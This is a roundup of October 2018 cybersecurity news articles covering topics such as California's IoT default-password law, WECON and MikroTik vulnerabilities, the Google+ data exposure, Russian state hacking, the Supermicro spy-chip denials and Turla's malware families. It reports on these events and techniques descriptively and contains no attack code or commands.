The bill, meant to combat the widespread use of weak passwords in connected devices such as Internet of Things (IoT) products, also demands that manufacturers implement a security feature in their devices to require users to select new means of authentication upon first use.

The use of weak passwords in connected devices is a well-known security issue that has fueled a broad range of cyber-attacks, including the emergence of numerous, large IoT botnets.

By targeting devices improperly secured with default or easy-to-guess passwords, IoT botnets such as Mirai (and its many variants), Gafgyt (also known as Bashlite), Reaper, Hide 'N Seek, and Torii can then be leveraged to launch massive distributed denial of service attacks, to send spam emails, for malware distribution, and for various other nefarious activities.

However, it’s not only IoT devices that are impacted by the use of default or weak passwords. The issue was also found in industrial control system (ICS) products, and security researchers even published a list of default credentials for ICS devices.

Recently signed into law by California governor Jerry Brown, the new bill, SB-327, which is set to enter in effect on January 1, 2020, attempts to mitigate the problem by requiring the makers of connected devices to properly secure those products.

“This bill, beginning on January 1, 2020, would require a manufacturer of a connected device, as those terms are defined, to equip the device with a reasonable security feature or features that are appropriate to the nature and function of the device, appropriate to the information it may collect, contain, or transmit, and designed to protect the device and any information contained therein from unauthorized access, destruction, use, modification, or disclosure, as specified,” SB-327 reads.

“There’s always more to do with information security, but sometimes targeted legislation addressing a specific problem can be effective,” Tim Erlin, VP, product management and strategy at Tripwire, told SecurityWeek in an emailed statement.

“Weak passwords are a problem, but this bill aims to address a more challenging and serious problem with poor default security in vendors’ products. It’s important that vendors see security as their responsibility, even after the customer takes possession of the product,” Erlin continued.

Ilia Kolochenko, CEO of security company High-Tech Bridge, also commented: “One should, however, keep in mind that banning weak passwords may also have a collateral effect. Some people will likely start using the same passwords everywhere, set long passwords and forget them, subsequently leaving the device without regular updates, or just invent passwords that will not fall under the legal definition of weak password but will remain easily brute-forceable. Nonetheless it’s still much better than inaction and ignorance.”


Code Execution Flaws Found in WECON Industrial Products
9.10.2018 securityweek
ICS

A significant number of vulnerabilities have been found recently in products from China-based WECON, but the vendor has been slow to release patches.

WECON specializes in human-machine interfaces (HMIs), programmable logic controllers (PLCs), and industrial PCs. The company's products are used all around the world, particularly in the critical manufacturing, energy, and water and wastewater sectors.

An advisory published recently by ICS-CERT reveals that researchers Mat Powell and Natnael Samson discovered several vulnerabilities in WECON's PI Studio HMI software. The list includes a critical stack-based buffer overflow that allows remote code execution, a high severity out-of-bounds write bug that also allows code execution, and two medium severity information disclosure flaws.

According to ICS-CERT, WECON has confirmed the vulnerabilities, but it has yet to release any patches.

ICS-CERT has this year published four advisories describing vulnerabilities in WECON products, including a medium severity flaw in the company's PLC Editor ladder logic software, and several high and medium severity bugs in LeviStudio applications.

All the vulnerabilities for which ICS-CERT has published advisories were reported by Samson, Powell and other researchers through Trend Micro's Zero Day Initiative (ZDI).

In fact, ZDI has already published 116 advisories in 2018 and over a dozen will be published in the upcoming period. However, it's worth noting that ZDI typically publishes multiple advisories for a single CVE as each advisory covers a variation of the same vulnerability.

On the other hand, many of the ICS-CERT advisories and a vast majority of the advisories from ZDI were published before patches were made available by the vendor.

A majority of the security holes allow remote code execution, but since they are related to how the affected applications handle certain file types, the attacker would need to convince the targeted user to open a specially crafted file in order to trigger the exploit.


How Secure Are Bitcoin Wallets, Really?
9.10.2018 securityaffairs
Security

Purchasers of Bitcoin wallets usually have one priority topping their lists: security. What’s the truth about the security of these wallets?
When buying conventional wallet coins and paper money, people often prioritize characteristics like the size, color, shape, and number of compartments.

However, purchasers of Bitcoin wallets — the software programs that facilitate storing someone’s cryptocurrency-related wealth — usually have one priority topping their lists: security.

So, the companies behind those wallets wisely emphasize why their products are more secure than what competitors offer and why that’s the case. But, beyond the marketing language, what’s the truth about the security of these wallets?

Guessing an Individual Bitcoin Wallet Key Is Tremendously Unlikely, Crypto Expert Says
People appreciate comparisons when thinking about the likelihood something might happen. Brian Liotti of the website Crypto Aquarium had that in mind when he carried out research and found the probability of guessing a Bitcoin key for one wallet is as likely as winning the Powerball nine times in a row.

So, that’s undoubtedly comforting to people who raise their eyebrows at the prospect of using a digital method to store their cryptocurrency investments.

A Wallet Owner Gets Locked out for Months
There’s also the detailed account of Mark Frauenfelder, who owned a Trezor wallet and couldn’t access it for several traumatizing months after misplacing the PIN that served as recovery words for the software. His tale of woe proves a hacker couldn’t contact a Bitcoin wallet manufacturer, masquerade as a wallet owner and get the goods for access.

A Teenager Hacked a Tamper-Proof Wallet
Ledger, a French company that sells Bitcoin wallets, found itself receiving unwanted publicity when a British teenager disclosed a proof of concept that allowed him to break into the Ledger Nano S, a wallet the company had advertised as unhackable. The hack focuses on the device’s microcontrollers.

One of them stores the wallet’s private key and the other acts as a proxy. The proxy microcontroller is reportedly so insecure it cannot differentiate between authentic firmware and that which a cybercriminal creates.

This case study, as well as others associated with less-than-locked-down Bitcoin wallets, emphasizes how people should not get too comfortable after buying a Bitcoin wallet, even one considered as being among the best of the best. The same goes for storing other types of money: Following best practices is always the ideal approach.

If a person owns collector coins, it’s essential to learn how to protect them from potential sources of damage — such as temperature extremes, acids and humidity. Although they exist in the cyber-realm, Bitcoins need safeguards of their own concerning hackers, especially as even the most high-tech options show they need improvement.

Alleged Break-Ins to McAfee’s Wallet
The Bitfi Bitcoin wallet, backed by cybersecurity executive John McAfee, offered a $250,000 bounty to anyone who could successfully hack it. And, in August 2018, a security research firm called OverSoft NL claimed success. The company behind the wallet then issued a second bounty in an attempt to find the weaknesses.

People in the cybersecurity sector expressed their frustrations about the reward, since participants have to abide by the company’s rules. In other words, if cybersecurity experts hacked the wallet in a way the company didn’t specify, they would not win the reward.

But, hacks carried out by malicious players never seem to follow such parameters. Often, they involve unusual methods that exploit vulnerabilities the manufacturer never fathomed. Other people said they had hacked the wallet before OverSoft NL, but not per the company’s rules.

Even representatives from the cybersecurity firm expressed doubts that they’d actually receive the money, believing the bounty to be nothing more than a marketing ploy. The bounty program has since become discontinued, with the company promising to launch another soon.

The Marketing Language Could Tempt Hackers
Whenever something in the tech industry gets presented as impossible to infiltrate, both ethical and malicious hackers frequently see a challenge to try and prove otherwise.

As John McAfee spoke of his wallet on Twitter, the tone could easily come across as overconfident and cocky: “For all you naysayers who claim that ‘nothing is unhackable’ & who don’t believe that my Bitfi wallet is truly the world’s first unhackable device, a $100,000 bounty goes to anyone who can hack it…” And indeed, hackers got to work and accepted the challenge.

Cryptocurrency Wallet Owners Cannot Be Too Careful
Although we’ve seen here how research shows Bitcoin wallet hacks are unlikely and that a wallet owner himself couldn’t even get access to his funds after losing the PIN, case studies show hacks are still possible.

People should always perform adequate research about security measures built into individual wallets but also use them intelligently by following good cyber security habits and never assuming a wallet couldn’t get hacked.


WECON PI Studio HMI software affected by code execution flaws
9.10.2018 securityaffairs
ICS  Vulnerebility

Security experts discovered several vulnerabilities in WECON’s PI Studio HMI software, the company has verified the issues but has not yet released patches.
Researchers Mat Powell and Natnael Samson discovered several vulnerabilities in WECON’s PI Studio HMI software, a software widely used in critical manufacturing, energy, metallurgy, chemical, and water and wastewater sectors.

Both experts have reported the flaw under the Trend Micro’s Zero Day Initiative,

WECON specializes in human-machine interfaces (HMIs), programmable logic controllers (PLCs), and industrial PCs. The company’s products are used all around the world, particularly in the critical manufacturing, energy, and water and wastewater sectors.

The list of flaws discovered by the experts includes a critical stack-based buffer overflow vulnerability, tracked as CVE-2018-14818, that could lead to remote code execution.

Another flaw tracked as CVE-2018-14810 is a high severity out-of-bounds write bug which may allow code to be executed in the context of an administrator,

The remaining issues are two medium severity information disclosure flaws tracked as CVE-2018-17889 and CVE-2018-14814.

“Successful exploitation of these vulnerabilities may allow remote code execution, execution of code in the context of an administrator, read past the end of an allocated object or allow an attacker to disclose sensitive information under the context of administrator.” reads the security advisory published by the ICS-CERT.

WECON has confirmed the vulnerabilities, but it has not revealed when it will release security patches.

WECON PI Studio 2

Below the list of mitigation provided by the ICS-CERT:

“WECON has verified the vulnerabilities but has not yet released an updated version.” continues the security advisory.

“NCCIC recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:

Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet.
Locate control system networks and remote devices behind firewalls, and isolate them from the business network.
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.”


Google was aware of a flaw that exposed over 500,000 of Google Plus users, but did not disclose it
9.10.2018 securityaffairs
Social

This is a very bad news for Google that suffered a massive data breach that exposed the private data of over 500,000 of Google Plus users to third-party developers.
As a consequence of the data exposure, the company is going to shut down the social media network Google+.

The root cause of the data breach is a security vulnerability affecting one of Google+ People APIs that allowed third-party developers to access data for more than 500,000 users.

Exposed data include including usernames, email addresses, occupation, date of birth, profile photos, and gender-related information.

The worse aspect of the story is that the company did not disclose the flaw in the Google+ when it first discovered the issue in this spring because it feared regulatory scrutiny and reputational damage.

“Google exposed the private data of hundreds of thousands of users of the Google+ social network and then opted not to disclose the issue this past spring, in part because of fears that doing so would draw regulatory scrutiny and cause reputational damage, according to people briefed on the incident and documents reviewed by The Wall Street Journal.” reported the Wall Street Journal.

“As part of its response to the incident, the Alphabet Inc. unit on Monday announced a sweeping set of data privacy measures that include permanently shutting down all consumer functionality of Google+.”

Google declared that its experts immediately addressed this vulnerability in March 2018 and that they have found no evidence that any developer has exploited the flaw to access users data. The flaw was present in the Google+ People APIs since 2015.

“We discovered and immediately patched this bug in March 2018. We believe it occurred after launch as a result of the API’s interaction with a subsequent Google+ code change.” reads a blog post published by Google.

“We made Google+ with privacy in mind and therefore keep this API’s log data for only two weeks. That means we cannot confirm which users were impacted by this bug. However, we ran a detailed analysis over the two weeks prior to patching the bug, and from that analysis, the Profiles of up to 500,000 Google+ accounts were potentially affected. Our analysis showed that up to 438 applications may have used this API.”

Google_Plus

The choice of not disclosing the vulnerability was probably influenced by the Cambridge Analytica scandal that was occurring in the same period.

“A memo reviewed by the Journal prepared by Google’s legal and policy staff and shared with senior executives warned that disclosing the incident would likely trigger “immediate regulatory interest” and invite comparisons to Facebook’s leak of user information to data firm Cambridge Analytica.” continues the WSJ.

Experts believe that the vulnerability in Google+ is similar to the one recently discovered in Facebook API.

Google will maintain Google+ only for Enterprise users starting from August 2019.

Google also provided information about the Project Strobe program that has seen a privacy internal task force conducting a companywide audit of the company’s APIs in recent months.

“In a blog post on Monday, Google said it plans to clamp down on the data it provides outside developers through APIs. The company will stop letting most outside developers gain access to SMS messaging data, call log data and some forms of contact data on Android phones, and Gmail will only permit a small number of developers to continue building add-ons for the email service, the company said.” concludes the WSJ.
“The coming changes are evidence of a larger rethinking of data privacy at Google, which has in the past placed relatively few restrictions on how external apps access users’ data, provided those users give permission. Restricting access to APIs will hurt some developers who have been helping Google build a universe of useful apps.”


Silk Road Admin Pleads Guilty
8.10.2018 securityweek
Crime

An Irish man pled guilty in a United States court to his role in the administration of Silk Road, a black-market website.

The man, Gary Davis, 30, of Wicklow, Ireland, who went by the online handle of “Libertas,” was a member of the small administrative staff behind the Silk Road website. On Friday, he pled guilty to conspiring to distribute massive quantities of narcotics, a charge arising out of his admin role.

Silk Road, an online marketplace that operated between 2011 and 2013, was used by “thousands of drug dealers and other unlawful vendors to distribute illegal drugs and other illicit goods and services to more than 100,000 buyers,” the Department of Justice said in an announcement.

Owned by Ross William Ulbricht, also known as “Dread Pirate Roberts,” “DPR,” and “Silk Road,” the marketplace was also used to launder hundreds of millions of dollars derived from the unlawful transactions it hosted. Ulbricht was sentenced in 2015.

Silk Road, which was shut down in October 2013, was ran by a small support staff that included both site administrators and forum moderators, documents presented in court claim.

The admins would monitor user activity, respond to customer service inquiries, and resolve issues between buyers and vendors. The forum moderators monitored user activity on discussion forums, provided guidance on how to conduct business on Silk Road, and reported significant problems to admins.

The court documents allege that Davis served as a forum moderator for Silk Road between May 2013 and June 2013 and that he then served as a site admin up to October 2, 2013.

His responsibilities included responding to customer support requests, resolving disputes that arose between drug dealers and buyers on the site, and enforcing the rules for doing business on Silk Road, which had been set by Ulbricht. Davis was reportedly paid a weekly salary for his work.

Davis was extradited to the United States four years after his arrest, prosecutors announced in July. On Friday, he pled guilty before United States District Judge Jesse M. Furman to one count of conspiracy to distribute narcotics.

Davis faces a maximum sentence of 20 years in prison. His sentencing has been scheduled for January 17, 2019.

“As he admitted today, Gary Davis served as an administrator who helped run the Silk Road marketplace. Davis’s arrest, extradition from Ireland, and conviction should send a clear message: the purported anonymity of the dark web is not a protective shield from prosecution,” Geoffrey S. Berman, the United States Attorney for the Southern District of New York, said.


Man Pleads Guilty to Hacking Websites of New York City Comptroller and West Point
8.10.2018 securityweek
BigBrothers

The United States Department of Justice (DoJ) this week announced that a California man has pleaded guilty to hacking the websites for the Combating Terrorism Center at the United States Military Academy in West Point, New York, and the Office of the New York City Comptroller.

The man, Billy Ribeiro Anderson, 41, of Torrance, California, also known as “Anderson Albuquerque” and “AlfabetoVirtual,” admitted to obtaining unauthorized access to the two websites and to defacing them by replacing publicly available contents of the website with hacker-generated content.

According to court documents, from 2015 through at least March 13, 2018, Anderson took responsibility for accessing various U.S. military, government, and business websites around the world, all without authorization.

Using the online handle of AlfabetoVirtual, he also committed more than 11,000 defacements of said websites, including websites for the Combating Terrorism Center at West Point and the NYC Comptroller.

The NYC Comptroller’s website was defaced on July 10, 2015. Anderson, who took responsibility for the incident, replaced the contents of the website to display the text “Hacked by AlfabetoVirtual,” “#FREEPALESTINE” and “#FREEGAZA.”

The hacker gained access to the website and was able to deface it by exploiting security vulnerabilities associated with the version of a plugin being used on the website.

Anderson defaced a website for the Combating Terrorism Center at West Point on October 4, 2016 and modified the site’s content to display the text “Hacked by AlfabetoVirtual.” He gained access to the site via an unauthorized administrative account that exploited a known cross-site script vulnerability, which allowed the hacker to bypass access controls.

Anderson also committed unauthorized intrusions of thousands of web servers worldwide through malicious code installed on the victim web servers. The code provided the hacker with administrative rights to the servers, which then enabled it to commit defacements and maintain a foothold on the compromised servers.

“The defendant pled guilty to two counts of computer fraud for causing damage to a protected computer, each of which carries a maximum sentence of 10 years in prison,” the DoJ announced. Anderson is scheduled for sentencing on February 13, 2019.


Russia's Hackers Long Tied to Military, Secret Services
8.10.2018 securityweek
BigBrothers

During the Soviet era, the country's top computer scientists and programmers largely worked for the secret services.

That practice appears to have resumed under President Vladimir Putin, as Russia faces accusations of waging a global campaign of cyber attacks.

Dutch officials on Thursday accused four Russians from the GRU military intelligence agency of attempting to hack into the global chemical weapons watchdog in The Hague.

The agency has investigated both the fatal poisoning of Russian former double-agent Sergei Skripal; and an alleged chemical attack by Moscow-allied Syrian President Bashar al-Assad.

The Baltic states were the first to accuse Moscow of mounting attacks to knock out their sites back in 2007.

Estonia said one such attack had put the country's main emergency service phone number out of action for over an hour.

Since then, accusations of cyber attacks have continued against Moscow.

The Russian hacker group variously known as Fancy Bear, APT 28 and Sofacy has been linked to GRU and accused of attacks on the US Democrats' 2016 presidential campaign, together with Russia's FSB security service, the successor to the KGB.

The skills of Russian hackers today developed from a tradition of excellent computing and programming skills dating back to the Soviet era.

"The whole structure of the economy was skewed towards the military sector," said Oleg Demidov, a consultant at the Moscow-based independent think-tank PIR Center.

"All the achievements of Soviet science including the first computers went to serve the military sector."

The most brilliant students were pushed to work in the military and space sector, he added.

- Banking crime -

After the Soviet Union fell apart in 1991, its armed forces were broken up and most of the top specialists turned to the nascent banking sector in Russia, either to work there or to attack it.

In this era saw the first cyber attacks on banking operations and the first mentions of Russian hackers.

"Now Russian hackers are excellently trained and equipped and they still occupy one of the top positions in banking crime," said Demidov -- even if the Russian justice system has begun to crack down on them.

In 2016, Russian cybersecurity giant Kaspersky estimated that between 2012 and 2015, Russian hackers had stolen at least $790 million worldwide.

Russian computer scientists study at "very strong universities in Saint Petersburg, Moscow, Novosibirsk, Kazan or Krasnoyarsk", said Denis Kuskov of TelecomDaily specialised research agency.

They "can work anywhere in the world, in any international company," he added.

In recent years, however, more have opted to stay in Russia, he said. "The secret services have grown more interested in good programmers and it's easier for them to find work in Russia now."

In 2012, the Russian defence ministry announced it was creating its own "cyber troops". It launched a wide recruitment drive that included promotional videos on social media.

For Demidov, the growing wave of attacks attributed to Russian hackers has come about as Russia becomes better able to defend its own cyber security more strongly, the military sphere included.

"These efforts... have began to bring results," he said.

Today however, even the most established players in Russian IT are in the sights of the West.

The US in 2017 imposed a ban on the use of Kaspersky's anti-virus software by federal agencies amid concerns about the company's links to the Russian intelligence services.

While many young Russians may choose to work for the military and secret services for reasons of patriotism, some may still be more interested by the money.

This week a military tribunal in Moscow held a closed-doors trial for the head of operational control at the FSB's centre for information security, Colonel Sergei Mikhalkov and three alleged accomplices.

Kommersant daily reported that they were accused of passing secrets on the Russian secret services' cyber technology to the FBI in return for $10 million.


UK, US Security Agencies Deny Investigating Chinese Spy Chips
8.10.2018 securityweek
BigBrothers

The U.S. Department of Homeland Security (DHS) and the U.K. National Cyber Security Centre (NCSC) have denied investigating the presence of Chinese spy chips in Supermicro servers, as claimed by a bombshell report published last week by Bloomberg.

According to Bloomberg, the Chinese government planted tiny chips in Supermicro motherboards in an effort to spy on more than 30 organizations in the United States, including government agencies and tech giants such as Apple and Amazon.

The report, on which Bloomberg reporters have been working for the past year using information from 17 sources, claims that Chinese agents masquerading as government or Super Micro employees pressured or bribed managers at the Chinese factories where the motherboards are built. Once the chips were planted, they would allow attackers to remotely access the compromised devices.DHS and NCSC respond to reports on Chinese spy chips

Apple and Amazon allegedly discovered the malicious hardware implants and contacted the FBI.

While many experts agree that it is technically possible to create and plant spy chips such as the one described, Apple, Amazon and Super Micro have strongly denied the reports, and their statements have now been backed by the DHS and the NCSC.

“We are aware of the media reports but at this stage have no reason to doubt the detailed assessments made by AWS and Apple,” stated the NCSC. “The NCSC engages confidentially with security researchers and urges anybody with credible intelligence about these reports to contact us.”

The DHS also published a statement on Saturday saying it's aware of the media reports.

“Like our partners in the UK, the National Cyber Security Centre, at this time we have no reason to doubt the statements from the companies named in the story,” the agency stated. “Information and communications technology supply chain security is core to DHS’s cybersecurity mission and we are committed to the security and integrity of the technology on which Americans and others around the world increasingly rely.”

No one has been able to independently confirm that the FBI has launched an investigation as a result of the discovery of spy chips, and a former Apple executive said the agency's representatives told him that they had never heard of this type of investigation.

Apple, Amazon and Super Micro have been contacted by Bloomberg several times while the article was being written, but they are not happy with the final result. While it's not uncommon for major companies to deny news reports, the statements issued by the tech giants named in the Bloomberg story stand out due to the fact that they are very detailed and attempt to show that the article is factually inaccurate.

“At no time, past or present, have we ever found any issues relating to modified hardware or malicious chips in SuperMicro motherboards in any Elemental or Amazon systems. Nor have we engaged in an investigation with the government,” Amazon said. “There are so many inaccuracies in ‎this article as it relates to Amazon that they’re hard to count.”

Apple claims it's disappointed that Bloomberg reporters have not been open to the possibility that their sources might be misinformed or wrong.

“Despite numerous discussions across multiple teams and organizations, no one at Apple has ever heard of this investigation. Businessweek has refused to provide us with any information to track down the supposed proceedings or findings. Nor have they demonstrated any understanding of the standard procedures which were supposedly circumvented,” Apple said.

For its part, Super Micro also denied knowing anything about a government investigation.

“The manufacture of motherboards in China is not unique to Supermicro and is a standard industry practice. Nearly all systems providers use the same contract manufacturers. Supermicro qualifies and certifies every contract manufacturer and routinely inspects their facilities and processes closely,” it stated.


Google Criticizes Apple Over Safari Security, Flaw Disclosures
8.10.2018 securityweek
Apple

One Year After Release, Google Fuzzer Still Finds Many Flaws in Safari

One year after it was released as open source by Google Project Zero, the Domato fuzzer has still found a significant number of vulnerabilities in Apple's Safari web browser.

In September 2017, Google Project Zero researcher Ivan Fratric announced the release of a new Document Object Model (DOM) fuzzer designed for testing web browser engines. At the time, he revealed that Domato had helped him find more than 30 vulnerabilities, including two flaws in Chrome’s Blink engine, four in Firefox’s Gecko, four in Internet Explorer’s Trident, six in EdgeHtml, and 17 in Safari’s WebKit.

Since the highest number of security holes was found in WebKit, Fratric recently decided to once again test it to see if any improvements have been made by Apple.

The same type of testing – running 100 million iterations using computing power that could be purchased for roughly $1,000 – Fratric uncovered nine new vulnerabilities, including six in what at the time was the current version of Safari. The researcher also noticed that a majority of the bugs were in the WebKit code for more than six months before they were discovered.

"While 9 or 6 bugs (depending how you count) is significantly less than the 17 found a year ago, it is still a respectable number of bugs, especially if we take into an account that the fuzzer has been public for a long time now," Fratric said in a blog post.

In an effort to demonstrate the risk posed by the types of flaws identified using the Domato fuzzer, Fratric created an exploit for one of the use-after-free issues – these types of bugs can in many cases allow arbitrary code execution.

The expert reported his findings to Apple in June and July, and patches were released in September. However, Fratric has criticized the tech giant for not disclosing the existence of the vulnerabilities in the initial version of its advisories.

Specifically, Apple resolved the flaws with the release of iOS 12, tvOS 12 and Safari 12 on September 17, but did not mention them in its advisories. Instead, the company added information about the security bugs to its initial advisories only on September 24, when it also released updates and advisories for macOS Mojave 10.14.

"The original advisories most likely didn’t include all the issues because Apple wanted to wait for the issues to also be fixed on MacOS before adding them. However, this practice is misleading because customers interested in the Apple security advisories would most likely read them only once, when they are first released and the impression they would to get is that the product updates fix far less vulnerabilities and less severe vulnerabilities than is actually the case," Fratric said.

"Furthermore, the practice of not publishing fixes for mobile or desktop operating systems at the same time can put the desktop customers at unnecessary risk, because attackers could reverse-engineer the patches from the mobile updates and develop exploits against desktop products, while the desktop customers would have no way to update and protect themselves," he added.


Expert presented a new attack technique to compromise MikroTik Routers
8.10.2018 securityaffairs
Hacking

Experts from Tenable Research have devised a new attack technique to fully compromise MikroTik Routers.
MikroTik routers continue to be under attack, and the situation is getting worse because of the availability of a new PoC code.

The new attack technique discovered by experts at Tenable Research could be exploited by remote attackers to execute arbitrary code on the vulnerable devices.

The experts at Tenable Research presented the technique on October 7 at DerbyCon 8.0 during the talk “Bug Hunting in RouterOS” at Derbycon, it leverages a known directory traversal flaw tracked as CVE-2018-14847.

Mikrotik routers vulnerable

The vulnerability was rated medium in severity was discovered in April, it affects the Winbox, that is a management console for MikroTik’s RouterOS software.

In the past months, MikroTik devices running RouterOS were targeted by malicious code that includes the exploit for the Chimay-Red vulnerability.

The Chimay Red hacking tool leverages 2 exploits, the Winbox Any Directory File Read (CVE-2018-14847) and Webfig Remote Code Execution Vulnerability.

Now Tenable Research devised a new attack technique that exploits the same CVE-2018-14847 issue to execute arbitrary code on the target device.

“The vulnerabilities include CVE-2018-1156 — an authenticated remote code execution (RCE) — as well as a file upload memory exhaustion (CVE-2018-1157), a www memory corruption (CVE-2018-1159) and a recursive parsing stack exhaustion (CVE-2018-1158). The most critical of these vulnerabilities is the authenticated RCE, which would allow attackers to potentially gain full system access. They were tested against RouterOS 6.42.3 (release date: 05-25-2018) using the x86 ISO.” reads a blog post published by Tenable Research.

“All of these vulnerabilities require authentication (essentially legitimate credentials). If the authenticated RCE vulnerability (CVE-2018-1156) is used against routers with default credentials, an attacker can potentially gain full system access, granting them the ability to divert and reroute traffic and gain access to any internal system that uses the router.”

Jacob Baines, the Tenable researcher who devised the attack technique, also made a proof of concept of the attack, he explained that it is possible to trigger a stack buffer overflow in the sprintf function of the licupgr binary.

“The licupgr binary has an sprintf that an authenticated user can use to trigger a stack buffer overflow. The sprintf is used on the following string:

MikroTik routers poc

“Where the user has control of the username and password strings, an authenticated user can exploit this to gain root access to the underlying system,” explained the expert.

What’s expected now?

MikroTik released RouterOS versions 6.40.9, 6.42.7 and 6.43 in August to address the flaws, users have to upgrade their devices and change the default credentials.

Unfortunately, the experts revealed that only approximately 30 percent of vulnerable modems have been patched, this means that roughly 200,000 routers could be hacked.

The good news is that currently, experts are not aware of the technique being exploited in the wild.

“Based on Shodan analysis, there are hundreds of thousands of Mikrotik deployments worldwide, with strong concentrations in Brazil, Indonesia, China, the Russian Federation and India. As of October 3, 2018, approximately 35,000 – 40,000 devices display an updated, patched version.” concludes Tenable Research.


Shedding Skin – Turla’s Fresh Faces
8.10.2048 Kaspersky
APT

Turla, also known as Venomous Bear, Waterbug, and Uroboros, may be best known for what was at the time an “ultra complex” snake rootkit focused on NATO-related targets, but their malware set and activity is much broader. Our current focus is on more recent and upcoming activity from this APT, which brings an interesting mix of old code, new code, and new speculations as to where they will strike next and what they will shed.

Much of our 2018 research focused on Turla’s KopiLuwak javascript backdoor, new variants of the Carbon framework and meterpreter delivery techniques. Also interesting was Mosquito’s changing delivery techniques, customized PoshSec-Mod open-source powershell use, and borrowed injector code. We tied some of this activity together with infrastructure and data points from WhiteBear and Mosquito infrastructure and activity in 2017 and 2018.

For a first, our KopiLuwak research identified targets and delivery techniques, bringing more accuracy and reliability to the discussion. Also interesting is a review of Turla scripting artefacts leading to newer efforts like KopiLuwak, tracing from older scripting in development efforts in WhiteAtlas and WhiteBear. And, we find 2018 KopiLuwak delivery techniques that unexpectedly matched Zebrocy spearphishing techniques for a first time as well.

Also highly interesting and unusual was the MiTM techniques delivering Mosquito backdoors. In all likelihood, Turla delivered a physical presence of some sort within Wifi range of targets. Download sessions with Adobe’s website were intercepted and injected to deliver Mosquito trojanized installers. This sort of hypothesis is supported by Mosquito installers’ consistent wifi credential theft. Meanwhile, injection and delivery techniques are undergoing changes in 2018 with reflective loaders and code enhancements. We expect to see more Mosquito activity into 2019.

And finally, we discuss the Carbon framework, tying together the older, elegant, and functional codebase sometimes called “Snake lite” with ongoing efforts to selectively monitor high value targets. It appears that the backdoor is pushed with meterpreter now. And, as we see code modifications and deployment in 2018, we predict more development work on this matured codebase along with selective deployment to continue into 2019.

Essentially, we are discussing ongoing activity revolving around several malware families:

KopiLuwak and IcedCoffeer
Carbon
Mosquito
WhiteBear
Technical Rattle
Turla’s Shifting to Scripting
KopiLuwak and IcedCoffee, WhiteBear, and WhiteAtlas
Since at least 2015 Turla has leveraged Javascript, powershell, and wsh in a number of ways, including in their malware dropper/installation operations as well as for implementing complete backdoors. The White Atlas framework often utilized a small Javascript script to execute the malware dropper payload after it was decrypted by the VBA macro code, then to delete the dropper afterwards. A much more advanced and highly obfuscated Javascript script was utilized in White Atlas samples that dropped a Firefox extension backdoor developed by Turla, but again the script was responsible for the simple tasks of writing out the extension.json configuration file for the extension and deleting itself for cleanup purposes.

IcedCoffee
Turla’s first foray into full-fledged Javascript backdoors began with the usage of the IcedCoffee backdoor that we reported on in our private June 2016 “Ice Turla” report (available to customers of Kaspersky APT Intelligence Services), which led later to their more fully functional and complex, recently deployed, KopiLuwak backdoor. IcedCoffee was initially dropped by exploit-laden RTF documents, then later by macro-enabled Office documents. The macro code used to drop IcedCoffee was a slightly modified version of that found in White Atlas, which is consistent with the code sharing present in many Turla tools. A noteworthy change to the macro code was the addition of a simple web beacon that relayed basic information to Turla controlled servers upon execution of the macro, which not only helped profile the victim but also could be used to track the effectiveness of the attack.

IcedCoffee is a fairly basic backdoor which uses WMI to collect a variety of system and user information from the system, which is then encoded with base64, encrypted with RC4 and submitted via HTTP POST to the C2 server. IcedCoffee has no built-in command capability, instead it may receive javascript files from the C2 server, which are deobfuscated and executed in memory, leaving nothing behind on disk for forensic analysis. IcedCoffee was not widely deployed, rather it was targeted at diplomats, including Ambassadors, of European governments.

KopiLuwak
In November 2016, Kaspersky Lab observed a new round of weaponized macro documents that dropped a new, heavily obfuscated Javascript payload that we named KopiLuwak (one of the rarest and most expensive types of coffee in the world). The targeting for this new malware was consistent with earlier Turla operations, focusing on European governments, but it was even more selectively deployed than IcedCoffee.

The KopiLuwak script is decoded by macro code very similar to that previously seen with IcedCoffee, but the resulting script is not the final step. This script is executed with a parameter used as a key to RC4 decrypt an additional layer of javascript that contains the system information collection and command and control beaconing functionality. KopiLuwak performs a more comprehensive system and network reconnaissance collection, and like IcedCoffee leaves very little on disk for investigators to discover other than the base script.

Unlike IcedCoffee, KopiLuwak contains a basic set of command functionality, including the ability to run arbitrary system commands and uninstall itself. In mid-2017 a new version was discovered in which this command set had been further enhanced to include file download and data exfiltration capabilities.

The most recent evolution in the KopiLuwak life cycle was observed in mid-2018 when we observed a very small set of systems in Syria and Afghanistan being targeted with a new delivery vector. In this campaign the KopiLuwak backdoor was encoded and delivered in a
Windows shortcut (.lnk) file. The lnk files were an especially interesting development because the powershell code they contain for decoding and dropping the payload is nearly identical to that utilized by the Zebrocy threat actor a month earlier.

Carbon – the long tail
Carbon continues to be deployed against government and foreign affairs related organizations in Central Asia. Carbon targeting in this region has shifted across a few countries since 2014. Here, we find a new orchestrator v3.8.2 and a new injected transport library v4.0.8 deployed to multiple systems. And while we cannot identify a concrete delivery event for the dropper, its appearance coincides with the presence of meterpreter. This meterpreter reliance also coincides with wider Turla use of open source tools that we documented towards the end of 2017 and beginning of 2018.

The Epic Turla operation reported in 2014 involved highly selective Carbon delivery and was a long term global operation that affected hundreds of victims. Only a small portion of these systems were upgraded to a malware set known as “the Carbon framework”, and even fewer received the Snake rootkit for “extreme persistence”. So, Carbon is known to be a sophisticated codebase with a long history and very selective delivery, and coincides with Snake rootkit development and deployment. In light of its age, it’s interesting that this codebase is currently being modified, with additional variants deployed to targets in 2018.

We expect Carbon framework code modifications and predict selective deployment of this matured codebase to continue into 2019 within Central Asia and related remote locations. A complex module like this one must require some effort and investment, and while corresponding loader/injector and lateral movement malware moves to open source, this backdoor package and its infrastructure is likely not going to be replaced altogether in the short term.

.JS attachments deliver Skipper/WhiteAtlas and WhiteBear
We introduced WhiteBear actionable data to our private customers early 2017, and similar analysis to that report was publicly shared eight months later. Again, it was a cluster of activity that continued to grow past expectations. It is interesting because WhiteBear shared known compromised infrastructure with KopiLuwak: soligro[.]com. WhiteBear scripted spearphish attachments also follows up on initial WhiteAtlas scripting development and deployment efforts.

Mosquito’s Changing 2018 Delivery Techniques
In March 2018, our private report customers received actionable data on Mosquito’s inclusion of fileless and customized Posh-SecMod metasploit components. When discussion of the group’s metasploit use was made public, their tactics began to change.

